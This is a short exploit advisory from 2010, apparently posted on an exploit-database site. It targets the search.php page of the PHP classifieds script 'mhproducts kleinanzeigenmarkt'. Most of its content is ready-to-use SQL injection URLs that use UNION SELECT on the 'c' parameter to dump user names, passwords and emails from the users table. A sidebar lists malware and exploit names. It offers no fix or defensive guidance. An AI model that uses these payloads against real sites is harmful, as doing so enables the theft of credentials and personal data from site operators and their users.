mhproducts kleinanzeigenmarkt (search.php) SQL Injection

Posted on 09 March 2010

========================================================
mhproducts kleinanzeigenmarkt (search.php) SQL Injection
========================================================

----------------------------Information------------------------------------------------
+Name : mhproducts kleinanzeigenmarkt search.php SQL Injection
+Autor : Easy Laster
+Date   : 09.03.2010
+Script  : mhproducts kleinanzeigenmarkt
+Download : ----------------
+Price : 9,99 euro
+Language :PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/portal/search.php?c=
 
#username
+Exploitable   : http://www.site.com/portal/search.php?c=-999999'+union+select+1,2,
3,4,5,convert(name using utf8),7,8,9,10,11,12,13,14,15+from+users--+
 
#user pass
+Exploitable   : http://www.site.com/portal/search.php?c=-999999'+union+select+1,2,
3,4,5,convert(password using utf8),7,8,9,10,11,12,13,14,15+from+users--+
 
or
 
+Exploitable   : http://www.site.com/portal/search.php?c=-999999'+union+select+1,2,
3,4,5,concat(name,0x3a,password,0x3a,email)7,8,9,10,11,12,13,14,15+from+users--+
 
 
-----------------------------------------------------------------------------------------


# ~  - [ [ : Inj3ct0r : ] ]

TOP

Malware :

None in database

Last 20

ckdoor:Win32/Heloag.A

Exploit:Win32/CVE-2011-3402

Trojan:Win32/Obfac

Exploit:Win32/Pdfjsc.YP

TrojanDownloader:Win32/Bofang.B

Last 20

Exploits :

Last 20